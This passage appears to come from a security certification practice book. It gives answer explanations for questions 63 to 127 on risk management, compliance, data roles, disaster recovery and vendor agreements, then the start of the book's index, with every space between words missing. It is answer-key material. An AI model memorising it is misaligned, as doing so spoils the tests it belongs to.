63. A. Adatagovernancepolicyclearlystateswhoownstheinformationcollectedandusedbyanorganization.Informationsecuritypoliciesprovidethehigh-levelauthorityandguidanceforsecurityprogramsandefforts.Acceptableusepolicies(AUPs)definewhatinformationresourcescanbeusedforandhow.Dataretentionpoliciesestablishwhatinformationanorganizationwillcollectandhowlongitwillbekeptbeforedestruction.

64. C. Helenhascreatedafunctionalrecoveryplanfocusedonaspecifictechnicalandbusinessfunction.Adisasterrecoveryplan(DRP)hasabroaderperspectiveandmightincludemultiplefunctionalrecoveryplans.RPOs,orrecoverypointobjectives,andMTBF,ormeantimebetween


failures,arenottypesofplanstypicallybuiltbyorganizations.

65. B. Healthinformationmaybecoveredbystate,local,orfederallaw,andGreg’sorganizationshouldensurethattheyunderstandanyapplicablelawsbeforestoring,processing,orhandlinghealthinformation.

66. C. Controlrisksspecificallyapplytofinancialinformation,wheretheymayimpacttheintegrityoravailabilityofthefinancialinformation.

67. D. Anindividualismostlikelytofaceidentitytheftissuesiftheirpersonallyidentifiableinformation(PII)isstolenorbreached.

68. C. ItiscommonpracticetoprohibitinteractiveloginstoaGUIorshellforserviceaccounts.Useofaserviceaccountforinteractiveloginsorattemptingtologinasoneshouldbeimmediatelyflaggedandalertedonasanindicatorofcompromise(IoC).

69. C. Assetmanagementpoliciestypicallyincludeallstagesofanasset’slifecycle,andassettagslikethosedescribedareusedtotrackassetsinmanyorganizations.Changemanagement,incidentresponse,andacceptableusepoliciesdonotrequireassettagging.

70. D. Thediagramshowsafullyredundantinternalnetworkwithpairsoffirewalls,routers,andcoreswitches,butwithasingleconnectiontotheInternet.ThismeansthatMeganshouldconsiderhowherorganizationwouldconnecttotheoutsideworldifthatlinkwasseveredordisrupted.Thereisnoindicationwhetherthisisawiredorwirelesslink,andtheimagedoesnotshowaredundantlink.

71. D. Emmashouldcategorizethisasasupplychainrisk.Whenorganizationscannotgetthesystems,equipment,andsuppliestheyneedtooperate,itcanhavesignificantimpactontheirabilitytoconductbusiness.Thatcouldcreatefinancialrisk,butfinancialriskisnotthedirectriskhere.Thereisnoindicationthatthevendorwillnotsupportthesystems,noristhereanyinformationaboutwhetherthereisanintegrationissueinthedescription.

72. A. Anintrusiondetectionsystem(IDS)candetectattacks,andisadetectivecontrol.Sinceitisatechnicalsystemratherthanaphysicalcontroloranadministrativepolicyorprocedure,Henrycancorrectlycategorizeitasatechnical,detectivecontrol.

73. C. TheFederalTradeCommission(FTC)doesnotprovidesecurityconfigurationguidesorbenchmarksforoperatingsystemsordevices.The


CenterforInternetSecurity(CIS),Microsoft(andothervendors),andtheNationalSecurityAgency(NSA)allprovideconfigurationbenchmarks.

74. C. Legacysystemsthatnolongerreceivesupportareasignificantconcernbecausetheycannotbepatchedifsecurityvulnerabilitiesarediscovered.Windows2008reacheditsendoflifeinJanuary2020.Itranonboth32-bitand64-bitplatforms,andyoucanstillinstallmodernwebserversonit.

75. B. Patchingisaformofavoidancebecauseitworkstoremoveariskfromtheenvironment.Acceptanceofflawsthatneedpatchingwouldinvolveleavingthesoftwareunpatched;mitigationstrategiesmightincludefirewalls,intrusionpreventionsystems(IPSs),orwebapplicationfirewall(WAF)devices;andtransferenceoptionsincludethird-partyhostingorservices.

76. B. Riskheatmapsorariskmatrixcanallowanorganizationtoquicklylookatrisksandcomparethembasedontheirprobabilityandimpactorotherratingelements.Qualitativeandquantitativeriskassessmentsaretypesofassessment,notmeansofpresentingriskinformationinaneasy-to-understandformat,andriskplotsarenotacommontermusedinthefield.

77. A. ThefinesthatcanresultfromviolationorinfringementofregulationsliketheGeneralDataProtectionRegulationcanhaveasignificantimpactonanorganization,orcouldevenpotentiallyputitoutofbusiness.Duetothis,organizationswilltrackcompliancewithregulationsaspartoftheirriskposture.

78. D. Disasterrecoveryrequiresforethoughtandpreparation,responsetoissuestominimizeimpactduringadisaster,andresponseactivitiesafteradisaster.Thus,acompletedisasterrecoveryplanshouldincludeactionsthatmayorwilloccurbefore,during,andafteradisaster,andnotjusttherecoveryprocessafterthefact.

79. B. Althoughdatabreachescouldresultinterminationofacardprocessingagreement,thefactthatherorganizationisnoncompliantismostlikelytoresultinafine.PCI-DSS,orPaymentCardIndustryDataSecurityStandard,isavendorstandard,notalaw,andcriminalchargeswouldnottypicallybefiledinasituationlikethis.

80. C. TheCloudSecurityAlliance’sCloudControlMatrixmapsexistingstandardstocommoncontroldescriptionsallowingcontrolrequirementstobecomparedandvalidatedacrossmanystandardsandregulations.TheCSAreferencearchitectureisasetofstandarddesigns,andISO27001and


ISO27002arestandardsformanaginginformationsecurity.

81. B. Gamificationmakestrainingintoagametogetmoreinvolvementandinterest.Scoringpointsandreceivingrewards,eitherin-gameorvirtually,canhaveasignificantpositiveimpactontheresponsetotraining.Capture-the-flageventsfocusontechniqueslikefindinghiddeninformationorotherwiseobtaining“flags”aspartofacontest.Phishingcampaignssendfakephishingemailstostafftoidentifyindividualswhomayfallforthem.Role-basedtrainingfocusesontrainingspecificallyfortheroleorjobthatanindividualhasorwillhave.

82. D. TheGeneralDataProtectionRegulation,orGDPR,requiresadataprotectionofficer(DPO).Theyoverseetheorganization’sdataprotectionstrategyandimplementation,andmakesurethattheorganizationcomplieswiththeGDPR.

83. D. Althoughrecoveringfromabreachcanbecostly,thelossofdatalikeintellectualpropertyincircumstancesliketheseisthemostcriticalissue.Theinstitutionislikelytosufferreputationalharmandmaynotbetrustedtoconductresearchlikethisinthefuture,leadingtoanevengreatercosttotheuniversity’sabilitytodonewresearchwiththegovernment.

84. B. Mission-essentialfunctionsaredefinedasthosefunctionsthatanorganizationmustrunthroughoutadisasterorthatmustberesumedasquicklyaspossibleafteroneiftheycannotbesustained.Theyarethecorefunctionsoftheorganizationandarekeytoitssuccessandongoingexistence.Asinglepointoffailure(SPOF)isapointwhereadevice,system,orresourcecanfailandcauseanentirefunctionororganizationtonolongerwork.Recoverytimeobjectives(RTOs)arethetimeallottedtoreturntonormalfunctionality.Corerecoveryfunctionsweremadeupforthisquestion.

85. B. ASLA(servicelevelagreement)definesthelevelofservicethecustomerexpectsfromtheserviceprovider.Thelevelofservicedefinitionsshouldbespecificandmeasurableineacharea.AnMOU(memorandumofunderstanding)isalegaldocumentthatdescribesamutualagreementbetweenparties.AnISA(interconnectionsecurityagreement)isanagreementthatspecifiesthetechnicalandsecurityrequirementsoftheinterconnectionbetweenorganizations.ABPA(businesspartnershipagreement)isalegalagreementbetweenpartners.Itestablishestheterms,conditions,andexpectationsoftherelationshipbetweenthepartners.


86. A. Customerdatacanincludeanyinformationthatacustomeruploads,shares,orotherwiseplacesinorcreatesviaaservice.Customersmayhavecontractualsecurityguaranteesinthetermsofservice,andnotificationorotherclausesmayalsoimpactwhatRickneedstodoifthedataisbreached.PIIispersonallyidentifiableinformationlikename,address,orotherdetailsthatcanidentifyaperson.Financialinformationmayincludebills,accountbalances,andsimilardetails.Healthinformationcoversabroadrangeofdataaboutanindividual’smedicalandhealthstatusorhistory.

87. C. Theftofproprietaryinformationlikeaformulaorcodeisanexampleofintellectualproperty(IP)theft.IPtheftcanbehardertoquantifythecostofalossinmanycasesbutcanhavesignificantimpacttoanorganizationthatreliesontheIPfortheirbusiness.Externalriskisriskcreatedbyfactorsoutsidetheorganization,internalriskiscreatedbytheorganizationitselforitsdecisions,andlicensingriskexiststhroughsoftwareandothercontracts.

88. B. Thisisanexampleofapersonnelcredentialpolicysinceitappliestothestaffwhoareemployedbyhisorganization.Policieslikethishelptoensurethataccountsarenotsharedorreused.Thereisnomentionofspecificdevices,serviceaccounts,oradministrativeaccounts.

89. C. Thelikelihoodofoccurrence,orprobability,ismultipliedbytheimpacttodeterminearisk’sseverity.

90. D. Organizationscandeterminehowtheywanttodetermineassetvalue,butconsistencyisimportantinmanycases.Thus,theoriginalcost,thereplacementcost,oradepreciatedcostmaybeused.

91. A. Abusinessimpactanalysis(BIA)helpstoidentifycriticalsystemsbydeterminingwhichsystemswillcreatethelargestimpactiftheyarenotavailable.MTBFisthemeantimebetweenfailures,anRTOisarecoverytimeobjective,andanICDwasmadeupforthisquestion.

92. D. Themostcommonmeansoftransferringbreachriskistopurchasecybersecurityinsurance.Acceptingbreachesisrarelyconsideredavalidriskprocess,blamingbreachesoncompetitorsdoesnotactuallytransferrisk,andsellingdatatoanotherorganizationisnotariskhandlingprocessbutmaybeabusinessprocess.

93. B. Serviceaccountsarenottypicallyallowedtouseinteractivelogins,andthusprohibitinginteractiveloginsisacommonsecuritypolicyforthem.Limitedloginhoursorlocationsaremorecommonlyusedforemployeeaccountswhentheyshouldnotbeaccessingresourcesafterhoursorfrom


nonworklocations.Frequentpasswordexpirationforserviceaccountsisactuallylikelytocauseaserviceoutage,andmanyserviceaccountshavecomplexpasswordsandaresetwithlongerpasswordexpirationtimeframesoraresettoneverexpire.

94. C. Thecostofabreachisanexampleoftheimpactofabreach.Probabilityishowlikelytheriskistooccur,andriskseverityiscalculatedbymultiplyingprobabilityandimpact.

95. B. Seanisconductingasiteriskassessmentthatwillhelphimunderstandandcommunicatetherisksthatthesiteitselfhas.IfthelocationisinaFEMA-identifiedfloodplain,orifthereareconcernsabouttornadoesorothernaturaldisasters,thoseneedtobetakenintoaccountastheorganizationmakesitsdecisionsaboutthelocation.ABIAidentifiesmission-criticalfunctionsandthesystemsthatsupportthem.Crimepreventionthroughenvironmentaldesignisadesignconceptthatusesthedesignoffacilitiestoreducethelikelihoodofcriminalactionsthroughuseoflightingandothercontrols.Businesscontinuityplanningfocusesonhowtokeepanorganizationoperatingdespitedisruptions.

96. D. SOC2engagementassessesthesecurityandprivacycontrolsthatareinplace,andaType2reportprovidesinformationontheauditor’sassessmentoftheeffectivenessofthecontrolsthatareinplace.AnSOC1reportassessesthecontrolsthatimpacttheaccuracyoffinancialreporting.Type1reportsareviewauditor’sopinionofthedescriptionprovidedbymanagementaboutthesuitabilityofthecontrolsasdesigned.Theydonotlookattheactualoperatingeffectivenessofthecontrols.

97. B. Ensuringthatleadershipthroughoutanorganizationisawareoftheriskstheorganizationfacesandthattheyareregularlyupdatingandprovidingfeedbackonthoseriskshelpsincreaseriskawareness.Inherentriskisriskthatexistsbeforecontrolsareinplace,andresidualriskisriskthatremainsaftercontrolsareinplace.Riskappetiteistheriskthatanorganizationiswillingtotakeaspartofdoingbusiness.

98. C. Statelawsoftenincludebreachnotificationthresholdsandrequirementsthatorganizationsmustfollow.Laurashouldensurethatsheisbothawareofthebreachlawsforherstateandanyotherstatesorcountrieshercompanyoperatesin,andthatherincidentresponseplanshaveappropriateprocessesinplaceifabreachoccurs.OrganizationsthatprocessdatalikeSSNsareunlikelytodeletethemevenifabreachoccurs,


reclassifyingdatawouldnothelpunlessthedatawasimproperlyclassifiedbeforethebreach,anddataminimizationplansareusedtolimithowmuchdataanorganizationhas,nottorespondtoabreachdirectly.

99. C. Nondisclosureagreements(NDAs)aresignedbyanemployeeatthetimeofhiring,andtheyimposeacontractualobligationonemployeestomaintaintheconfidentialityofinformation.Disclosureofinformationcanleadtolegalramificationsandpenalties.NDAscannotensureadecreaseinsecuritybreaches.Ajobrotationpolicyisthepracticeofmovingemployeesbetweendifferenttaskstopromoteexperienceandvariety.Separationoftieshasmorethanonepersonrequiredtocompleteatask.Mandatoryvacationpolicyisusedbycompaniestodetectfraudbyhavingasecondperson,familiarwiththeduties,helpdiscoveranyillicitactivities.

100. B. Oliviashouldestablishaservicelevelagreement(SLA)withherprovidertoensurethattheymeettheexpectedlevelofservice.Iftheydon’t,financialorotherpenaltiesaretypicallyincluded.OliviashouldensurethatthosepenaltiesaremeaningfultohervendortomakesuretheyaremotivatedtomeettheSLA.AnMOUisamemorandumofunderstandingandexplainstherelationshipbetweentwoorganizations;anMSAisamasterservicesagreement,whichestablishesabusinessrelationshipunderwhichadditionalworkordersorotherdocumentationdescribetheactualworkthatisdone;andaBPAisabusinesspartnershipagreement,whichisusedwhencompanieswishtopartneroneffortsandmayoutlinedivisionofprofitsorresponsibilitiesinthepartnership.

101. D. Themostaccurateriskdescriptorforthisissoftwarecompliance.Althoughthisisaninternalrisk,softwarecompliancefullydescribestheissue.Intellectualproperty(IP)theftriskoccurswhenanorganization’sintellectualpropertyisstolen,notwhenlicenseviolationsforthirdpartiesoccurs.Thisisnotalegacysystem,oratleastitwasnotdescribedthatwayinthequestion.

102. D. Inherentriskistheriskthatanorganizationfacesbeforecontrolsareputinplace.Withoutriskassessmentandcontrolsinplace,Garymustfirstdealwiththeinherentriskstheorganizationhasasitexiststoday.Residualriskistheriskthatisleftaftercontrolsareputinplace.Thetheftofintellectualproperty(IP)likealgorithms,formulas,andprocessesareIPrisks,andmultipartyriskisriskthatimpactsmorethanonegroup,company,orperson.


103. A. Thesinglelossexpectancy(SLE)describeswhatasingleriskeventislikelytocost.Itiscalculatedusingtheassetvalue(AV)timestheexposurefactor(EF),whichisanestimatedpercentageofthecostthatwilloccurindamageifthelossoccurs.MTTRisthemeantimetorestore,AROistheannualrateofoccurrence,andRTOistherecoverytimeobjective.ThesearenotpartoftheSLEequation.

104. C. Third-partycredentialpoliciesaddresshowcontractorsandconsultantscredentialsarehandled.Thismayrequiresponsorshipbyaninternalstaffmember,additionalcontrolsregardingpasswordresetsorchanges,andshorterlifespans,amongothercontrolsandrequirements.

105. B. Annualrateofoccurrence(ARO)isexpressedasthenumberoftimesaneventwilloccurinayear.Waynehasestimatedthattheriskeventthatisbeingassessedwillhappenthreetimesayear.

106. D. Althoughhumanscancreatefiresorfloods,industrialaccidentsaretheonlyitemonthelistthatareexclusivelyperson-madedisasters.

107. C. Informationonawebsitemadeavailabletocustomersistypicallyclassifiedaspublicinformationbecauseitiseasilyavailableandintentionallyexposedtothem.Confidential,sensitive,orcriticalinformationisunlikelytobeexposedtocustomerswithoutaspecificdatahandlingagreementandadditionalsecuritylayers.

108. D. Dataprocessorsareserviceprovidersthatprocessdatafordatacontrollers.Adatacontrollerordataowneristheorganizationorindividualwhocollectsandcontrolsdata.Adatastewardcarriesouttheintentofthedatacontrollerandisdelegatedresponsibilityforthedata.Datacustodiansarethosewhoareentrustedwiththedatatostore,manage,orsecurethedata.

109. D. Datamaskingpartiallyredactssensitivedatabyreplacingsomeorallinformationinasensitivedatafieldwithblanksorotherreplacementcharacters.Tokenizationreplacessensitivedatawithuniqueidentifiersusingalookuptable.Hashingperformsaone-wayfunctiononavaluetogetauniquehash,andencryptionprotectsdatausinganalgorithmthatcanbereversedtorestoretheoriginaldatawhileallowingforconfidentialityandintegrityvalidation.

110. C. TheCloudSecurityAlliance’sreferencearchitectureincludesinformationabouttoolsinavendor-neutralmanner.CISprovidesvendorspecificbenchmarksforAWS,Azure,andOracle’scloudofferings.The


InternationalOrganizationforStandardization(ISO)andtheNationalInstituteofStandardsandTechnology(NIST)donotofferthistypeofresource.

111. C. Locksarephysicalcontrols.Anexampleofamanagerialcontrolwouldbeapolicyorpractice,atechnicalcontrolcanincludethingslikefirewallsorantivirus,andcorrectivecontrolsareputinplacetoensurethataproblemorgapinanothercontrolisfixed.

112. C. Controlriskisatermusedinpublicaccounting.Itistheriskthatarisesfromapotentiallackofinternalcontrolswithinanorganizationthatmaycauseamaterialmisstatementintheorganization’sfinancialreports.Inthiscase,thelackofcontrolsthatwouldvalidatethefinancialsystem’sdataandfunctionisacontrolrisk.

113. C. Althoughfires,oilspills,andwarsareallpotentialexamplesofperson-madedisasters,hurricanesremainsolelyanaturaldisaster.Somedisasterscouldbeeitheraperson-madeornaturaldisaster.Forexample,firescanbecausedbyhumansorbynature,ascanfloods,andevenchemicalspillswhenanearthquakeoccurs.

114. C. ConfidentialinformationisclassifiedbytheU.S.governmentasinformationthatrequiressomeprotectionandthatifdisclosedwithoutauthorization,wouldcauseidentifiableharmtonationalsecurity.TopSecretinformationrequiresthehighestdegreeofprotectionandwouldcauseexceptionallygraveharmifexposedwithoutauthorization.Secretinformationrequiresasubstantialdegreeofprotectionandwouldcauseseriousdamageifexposed.BusinessSensitiveisnotaU.S.governmentclassificationbutisatermcommonlyusedinbusinesses.

115. C. Phonenumbersuniquelyidentifyindividuals,makingthemanexampleofpersonallyidentifiableinformation,orPII.PHIisprotectedhealthinformation,financialinformationincludesfinancialrecordsofalltypes,andgovernmentinformationisinformationthatbelongstothegovernmentormaybeclassifiedbythegovernmentandentrustedtoanorganization.

116. B. Tokenizationisanidealoptionforthisscenario.Tokenizationreplacesasensitivevaluewithanalternatevaluethatcanbelookedupinatablewhenthevalueneedstobereferencedbacktoitsoriginalform.Encryptiondoesnotmeetthisneed,datamaskingonlyhidespartofthevalue,anddatawashingisnotacommonlyusedtermfortechniquesofthisnature.

117. C. Privacynoticesareoftenincludedonwebsitestomeettherequirements


oflawsorregulationsliketheGeneralDataProtectionRegulation(GDPR)orstateprivacylaws.

118. C. Nicoleisadatacontroller,sometimescalledadataowner.Shedeterminesthereasonsforprocessingpersonalinformationandhowitisprocessed.Adatastewardcarriesouttheintentsofthedatacontroller,datacustodiansarechargedwithsafeguardinginformation,anddataconsumerisnotacommondataprivacyrole.

119. B. Thisisaninternaldisaster—oneinwhichinternalissueshaveledtoaproblem.Anexternaldisasterwouldbecausedbyforcesoutsidetheorganizationlikeanaturaldisaster,maliciousactivity,orotheroutsideforces.AnRTO,orrecoverytimeobjective,isnotatypeofdisaster,andanMROdisasterwasmadeupforthisquestion.

120. C. Minimizingtheamountofdatathatiscollectedisthefirststepinensuringthatorganizationscanhandlethevolumeandtypesofdatathattheyworkwith.Afterthat,classifyingitandthendetermininghowlongyouretainitarealsoimportantpartsofthedatalifecycle.

121. D. KirkhasmitigatedtherisktohisorganizationbyincreasingtheresourcestargetedbytheDoSattackinanattempttoensurethattheattackwillnotbesuccessful.Acceptancewouldinvolvesimplylettingtheattacksoccurknowingtheyarelikelytostop,avoidancemightinvolvefindingawaytoensuretheattackscannotoccur,andtransfercouldleverageathird-partymirrororanti-DoShostingservice.

122. A. Amultipartyriskinvolvesmultipleorganizations.Sincetherearemultiplecustomersandorganizationsinvolved,thisisanexampleofmultipartyrisk.Aninternalriskoriginatesinsideanorganization—instead,thisisanexternalrisk.Alegacysystemriskiscreatedbyasystemorprocessthatisnolongersupportedorupdated.Anintellectualproperty(IP)theftriskoccurswhenproprietaryinformationortradesecretsmightbeexposedorlost.

123. B. EOL,orendoflife,occurswhenaserviceorsystemisnolongersupported,available,ordoesnotfunction.Natashaneedstoplantotransitionsmoothlyawayfromtheservice,eithertoareplacementserviceortostopusingtheserviceitself.AnMOUisamemorandumofunderstanding,andanNDAisanondisclosureagreement,neitherofwhichisdirectlyrelevanthere.AlastwillandtestamentisnotusedforaserviceEOL.


124. C. TheCenterforInternetSecurity(CIS)providesawiderangeofOS,application,server,andotherbenchmarks.MicrosoftprovidesbenchmarksfortheirownoperatingsystemsbutdoesnotprovideLinuxbenchmarks.TheNationalInstituteofStandardsandTechnology(NIST)doesnotprovidebenchmarks,buttheNationalSecurityAgency(NSA)does.

125. C. Offboardingprocessesareconductedtoensurethataccountsandaccessisremovedandthatmaterials,computers,anddataareallrecoveredfromthestaffmemberwhenamemberofanorganizationleaves.ExitinterviewsareanHRprocess,jobrotationhelpstopreventanindividualfromconductingfraudulentactivitiesovertime,andgovernancehelpstomanageandmaintaindatabyestablishinghighlevelcontrolovertheprocesses,procedures,andclassificationofthedataanorganizationuses.

126. D. Public,private,sensitive,confidential,critical,andproprietaryareallcommonlyuseddataclassificationlabelsforbusiness.Secret,however,ismorecommonlyusedingovernmentclassificationschemes.

127. D. Privacynoticesarefrequentlyprovidedaspartoflicenseorcontractualterms,aswellasinwebsiteusageagreements.


IndexA

academicjournals,211

acceptableusepolicy(AUP),161,172,283,290

accesscontrollists(ACLs),130,266–267

accesspolicies,265–266

accounts

disabling,254

Guest,103–104,113,251,258

service,251,293

user,258

activenodes,238–239

activereconnaissance,29,203

activescans,16,195

adhocwirelessnetworks,98–99,248

AddressResolutionProtocol(ARP)

blocking,257

poisoning,2,7,24,25,186,190,200

spoofing,200

administrativecontrols,287

AdvancedEncryptionStandard(AES),52,217

advancedpersistentthreats(APTs),13,18,20,21,191,193,196,197,273

adware,17,193,195,198

airgapping,78,213,235

AISservice,208


alarms,68,227–228

allowlists,130,266–267

annuallossexpectancy(ALE),167,169,287,289

annualrateofoccurrence(ARO),169,287,289,295

anomaly-baseddetectionsystems,263

anonymization,171–172,290

antivirus(AV)programs,10,165,191,284,285

Apachelog,38,209

applicationblocklist,274

applicationcounter,221

applicationprogramminginterface(API),5,51,79,188,216,236,258

Arduino,48,214

artifacts,270,272

artificialintelligence(AI),210

assetmanagementpolicies,291

assetvalue(AV),295

asymmetriccryptography,71,230

asymmetricwarfare,196

@command,275

attestationprocesses,233

attribute-basedaccesscontrol(ABAC),114,255,259

audiosteganography,77,234

audit/auditing,196,198,262

authentication,authorization,andaccounting(AAA),231

AuthenticationHeader(AH),85,239,248

authority,24,200

automation,225


Autopsy,274,275

awarenesstraining,5,188

B

backdoor,8,19,21,22,24,190,196,198,200

back-offalgorithms,246

backups,130–131,267

badges,66,226

BadUSB,199

baselineconfigurations,53,217

baselining,56,219,245

Bashshell,26,150,201,278

bastionhost,249

Bcryptalgorithm,80,236

biometricscans,48,214–215

birthdayattack,11,12,21,28,192,198,203

bit,214

BitLockerkeys,230

blackhole,52,216

black-boxtest,190,200,201,203,204

blacklisting,91,243,244

blockcipher,214

blockchain,51,216

blueteams,4–5,22,30,188,199,204

bluejacking,3,5,10,11,27,32,186,188,191,192,202,205

bluesnarfing,5,10,32,188,191,205

bollards,55,66,219,226

bookmarks,271


bootattestation,254

bootsectorvirus,16,17,195

botnets,7,17,189,195

BridgeProtocolDataUnit(BDPU),262

bringyourowndevice(BYOD),105,252

brute-forceattacks,12,13,19,21,71,192,193,197,198,203,230

bufferoverflow,5,16,18,21,22,26,188,194,195,196,198,199,201,243

bugbounties,35,207

burningmedia,79,236

businesscontinuityplan(BCP),275

businessimpactanalysis(BIA),165,177,285,293

businesspartnershipagreement(BPA),162,165,179,283–284,286,294

C

cablelocks,55,219

Cacti,274

captiveportal,83,238

cardcloning,29,198,203

catcommand,269

CenterforInternetSecurity(CIS),167,174,180–181,183,287,291,297

CentOS,270

certificateauthority(CA),264

certificatechains,262

certificateexpirationtracking,204

certificatepinning,266

certificaterevocationlists(CRLs),241

certificatestapling,85,239

-cflag,268


chainofcustody,132–133,268,273

ChallengeHandshakeAuthenticationProtocol(CHAP),106,120,251,252,263

changemanagement,161,282–283

CIAtriad,202

cleandeskpolicy,161,162,164,169,283,285,289

clickjacking,3,44,186,212

client-sidetampering,48,214

closedthreatintelligence,205

closed-circuittelevision(CCTV),71,165,230,286

cloudaccesssecuritybroker(CASB),59–60,125,222,239,265

cloudapplications,264

cloudbackups,223

CloudControlMatrixmaps,292

cloudfirewall,103,251

CloudSecurityAlliance,292,295

cloudservice

providersin,234

vulnerabilitiesin,204

code

digitallysigned,248

formatting,195

reviewing,247

signing,244

codereuseattack,61,223

coldaisle,59,221

coldsite,50,68,215,228

collisions,12,71,193,230


collusion,169,288–289

commonname(CN),90,242

CommonVulnerabilitiesandExposures(CVE),11,192,211

communitycloud,64,65,225

compensatingcontrol,164,285,287

conditionalaccess,118,261

configuration

managing,259

reviewsof,212

weak,196

consensus,16,194

containerization,252

containment,132,150,268,278,280

contentfilter,272

Content-AddressableMemory(CAM),272

context-awareauthentication,249

ContinuityofOperationsPlanning(COOP),133,147,150,268,276,278

continuousintegration/continuousdelivery(CI/CD),64,225

controldiversity,235

controlrisks,290,296

cookies,88,241

correctivecontrol,284

correlationdashboards,130,267

countermode(CTR),50–51,215

coverageoverlap,254

credentialharvesting,5,188

credentialedscan,17,195


criminalsyndicates,9,191

cross-overerrorrate(CER),65,70,226,229

cross-siterequestforgery(XSRF),11,16,21,26,36,44,192,194,198,201,208,212

cross-sitescripting(XSS),2,3,5,6,7,11,16,20,21,26,36,186,188,190,192,194,197,198,201,208

cryptographichashes,186,227

Cuckoo,146,276

CuckooSandbox,136,270

curlcommand,155,281

customerdata,293

CVSSstandard,132,267

CyberKillChain,132,145,267,276

cyberintelligencefusion,11,192

D

darkweb,30,203

data

governancepolicyfor,172,290

maskingof,166,286,295

minimizationof,166,182,286,296

retentionpolicyfor,167,169,287,289

storing,223

databreaches

commonresultsof,290

costof,293

notificationsfor,277

recoveringfrom,292


datacontroller,296

DataEncryptionStandard(DES),52,217

datalossprevention(DLP),72,124,139,142–143,231,253,265,272,274,277

dataowner,296

dataprocessors,180,295

dataprotectionofficer(DPO),176,292

dataretrieval,241

datasovereignty,229

databaseadministrator(DBA),226

deadbolts,229

deepfakes,219

degaussing,79,236,258,273

demilitarizedzone(DMZ),72,78,89,90,107,108,111,112,230,231,235,242,243,253,255,257

denial-of-service(DoS)attack,22,34,38,198,206–207,209–210

deploymentpolicies,53,217

deprovisioning,56,219

detectivecontrol,163,164,167,284,285,286,287

deterrentcontrol,164,167,284,285,287

developmentserver,51,216

DiamondModel,132,267

dictionaryattacks,9,12,28,191,192,203

differentialbackups,65,225

digitalcertificates,246,260

digitalforensics,57,220,268,270,272,273,277,281–282

digitalsignatures,48,76,214,233

directorytraversalattacks,30–31,204


disassociationattack,12,13,192,193

disasterrecovery(DR)plan,147,154,172,175,180,276,281,290,292,296

discretionaryaccesscontrol(DAC),111,114,257,259

diskbackup,62,223

DistinguishedEncodingRules(DER)format,126,266

distributeddenial-of-service(DDoS)attack,13,22,187,190,193,195,198,222

DLLinjection,18,196

DNSlogs,133,268–269

dnsenumtool,147,276,277

domainexperts,207

domainhijacking,6,189

DomainNameSystem(DNS)

DNShijacking,6,189

DNSserver,212

DNSsinkhole,58,221

poisoningattacks,7,21,24,190,198,200

DomainNameSystemSecurityExtension(DNSSEC),99,238,248

domainreputationservices,8,190

domaintheft,189

downgradeattacks,12,31,193,204

drones,57,206,220,233

dualcontrol,237

duecare,161,282–283

duediligence,161,282–283

dumpfile,279

dumpsterdiving,28,191,202

dynamiccodereview,247


DynamicHostConfigurationProtocol(DHCP),87,101,240,250,279

E

EAPTunneledTransportLayerSecurity(EAP-TTLS),94,245,251

EAP-FAST,94,245

east-westtraffic,82,237

edgecomputing,74,232,236

802.1x,80,119,236,262

elasticity,incloudcomputing,56,226

electromagneticinterference(EML),218

electronicdiscovery(e-discovery),282

electroniclocks,229

elicitation,16,195

ellipticalcurvecryptography(ECC),74,214,215,232

emailheaders,278

embeddedsystems,216,224

encryption,76,78,101,234,235,249

encryptionkeys,231

endoflife(EOL),183,297

endpointdetectionandresponse(EDR),102,250

entropy,54,218

errorhandling,14,44,194,212

escalation,284

eviltwinattack,10,11,20,24,32,191,192,197,200,205

exitinterviews,193,297

exposurefactor(EF),295

extendedvalidation(EV),252

ExtensibleAuthenticationProtocol(EAP),251


F

facialrecognitionsystems,71,223,230

faketelemetry,56,219

falseacceptancerate(FAR),70,226,229

falsenegative,15,36,194,208

falsepositive,15,36,194,208

falserejectionrate(FRR),70,229

familiarity,16,194

Faradaycage,55,69,218,229,233

FederalBureauofInvestigations(FBI),150,278

FederalEmergencyManagementAgency(FEMA),150,278

FederalTradeCommission(FTC),174,291

Feedburner,34,206

fencing,232

FIDOU2F,84,238

field-programmablegatearray(FPGA),48,214

filepermissions,266

FileTransferProtocol(FTP),16,195

FileTransferProtocolSecure(FTPS),239

filelessvirus,199

filesystems,256

fingerprintreadersystems,62,223

firewalls,77,88,216,234,241,286

firmware,223,269

5G,79,236

fogaggregator,101,249

fogcomputing,80,236


footprinting,35,207

formattingcode,195

forwardproxy,112,114,257

FTKImager,270,274

full-diskencryption(FDE),52,63,90,112,117,216–217,219,224,226,242,252,253,258,261,275

fullyqualifieddomainname(FQDN),242

function-as-a-service(FaaS),221

fuzzing,101,245,249–250,252

G

gaitanalysis,64,225

gamification,175,292

GeneralDataProtectionRegulation(GDPR),162,170,283,289,292

generator,75,233

generators,165–166,286

geofence,95,245

geolocation,213

GitHub,40,210

GlobalPositioningSystem(GPS),89,241

governmentdata,290

graymarket,38,209

gray-boxtest,201

grepcommand,144,275

Guestaccounts,103–104,113,251,258

H

hacktivism,196

hacktivists,18,19,39,196,210


hardening,93,242,244,259

hardwarefirewall,103,251

hardwaresecuritymodel(HSM),52,95,217,246,256,259

hashfunctions,47,213,214

hashing,101,130,249,266,269,275,295

hashingpasswords,71,74,223,230,232,244

headcommand,269

healthinformation,172,290

heatmaps,243

HMAC-basedone-timepassword(HOTP),69,228,231,238

hoax,36,208

homomorphicencryption,62,223

honeyfiles,80,236

honeynets,52,215,216

honeypots,49–50,52,215,216,219

host-basedfirewalls,117,261

host-basedintrusionpreventionsystem(HIPS),117,259,261

hotaisle,59,221

hotsite,50,68,215,228

hpingtool,152,279

HTTPports,211

HVACsystems,53,218

hybridcomputing,74,232

hybriddeploymentmodel,65,225

hybridmodels,54,218

hybridwarfare,36,208

hypervisor,54,218,273


I

identityandaccessmanagement(IAM),231

identityattributes,242

identityfraud,39,210

identityprovider(IdP),83,238

identitytheft,210

identity-as-a-service(IDaaS),58,221

impactcategories,211

impersonation,16,195

incidentresponse,267,273,276,278

indicatorsofcompromise(IoC),4,187

industrialcamouflage,72,230

inertgassystems,233

InformationSharingandAnalysisCenters(ISACs),206

infrared(IR),71,230,251

infrastructureasaservice(IaaS),54,58,64,78,209,218,221,225,235,253

infrastructureascode(IaC),60,222

inherentrisk,179,181,295

initializationvectors(IVs),2,11,186,192,232

inputhandling,40,210

inputvalidation,2,186,243,249–250

insiderthreats,18,196,261

integeroverflow,22,26,199,201

integritychecking,56,219

intelligencefusion,33,205

interconnectionsecurityagreement(ISA),162,176,283–284,292

internaldisaster,296


internalrisks,289

internalservices,255

InternationalOrganizationforStandardization(ISO),295

Internetkeyexchange(IKE),249

InternetRelayChat(IRC),202

